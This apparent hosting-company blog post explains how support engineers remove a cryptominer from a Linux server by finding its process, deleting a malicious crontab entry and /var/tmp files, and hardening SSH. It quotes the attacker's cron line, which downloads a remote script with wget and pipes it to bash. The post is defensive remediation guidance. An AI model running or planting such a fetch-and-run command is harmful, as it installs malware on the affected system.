Bobcares
Client Area
Emergency Support
Latest | Server Management

Malicious TMP processes – How to resolve

by | Mar 5, 2021

Are you dealing with malicious tmp processes? We can help you tackle it.

Recently, one of our customers contacted us siting that there was a process showing in CPU stats that consumed around 90%. This was a crypto miner malware and this should be deleted from the server.

Here at Bobcares, we have seen several such Linux-related errors as part of our Server Management Services for web hosts and online service providers.

Today we will see how to resolve the malicious tmp processes problem.

 

What causes malicious tmp processes problem to arise

Here are the different causes for this problem to arise.

  • A brute force attack against SSH accounts
  • Automated installation of a pre-compiled binary once access is obtained.
  • Modifying the system to ensure malware persistence.
  • Start mining cryptocurrencies on the victim’s CPU or GPU.

Mostly, this attack is not destructive. But we can’t ensure what else was modified during the attack. So we have to reload the affected system completely from known good backups which wastes our time.

 

How to resolve malicious tmp processes problem

Now let’s take a look at how our Support Engineers resolve this issue for our customers.

As mentioned above, we had a customer who approached us with this crypto miner malware.

We can check whether the process is running using the command given below:

ps aux | grep <processname>

We look at the cronjob of this user:

crontab -u username -l

If it has this string:

* * * * wget -q -O – http://192.98.132.xxy:8220/mr.sh | bash -sh > /dev/null 2>&1

Then we edit this cronjob using the below command.

crontab -e -u username

OR

Delete the cronjob using the below command.

crontab -r -u username

Then delete the corresponding files in /var/tmp and /tmp folder.

/var/tmp/sustes
/var/tmp/sustes3
/var/tmp/wc.conf
/var/tmp/123

 

Preventing Cryptomining on Linux

To protect against these attacks, here are the different steps our Support Engineers suggest to our customers.

  • Disabling all default system login accounts.
  • Disabling SSH password logins and set SSH private key authentication.
  • Enabling two-factor authentication for SSH.
  • Blocking access to all network services that do not need to be exposed to the Internet (for example, databases, control panels and SSH ports).
  • Also, make sure to monitor systems for unusual CPU, memory, disk, and network activity.
  • Use host-based intrusion detection to spot any problems that might have slipped through.

[Still not able resolve malicious tmp processes? – We are here to help you]

 

Conclusion

Today, we saw how our Support Engineers resolve malicious tmp processes.

Related posts:

  1. SELinux on CentOS 7 – How to set up
  2. Useful Command Line for Linux Admins with examples
  3. Restarting Linux Services With NCPA in Nagios – Let us discuss
  4. Welcome to Emergency mode in Linux – Boot error

PREVENT YOUR SERVER FROM CRASHING!

Never again lose customers to poor server speed! Let us help you.

Our server experts will monitor & maintain your server 24/7 so that it remains lightning fast and secure.

GET STARTED

var google_conversion_label = "owonCMyG5nEQ0aD71QM";

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

server management

Spend time on your business, not on your servers.

TALK TO US

Or click here to learn more.

Related Articles

  1. SELinux on CentOS 7 – How to set up
  2. Useful Command Line for Linux Admins with examples
  3. Restarting Linux Services With NCPA in Nagios – Let us discuss
  4. Welcome to Emergency mode in Linux – Boot error

Never again lose customers to poor
server speed! Let us help you.

GET STARTED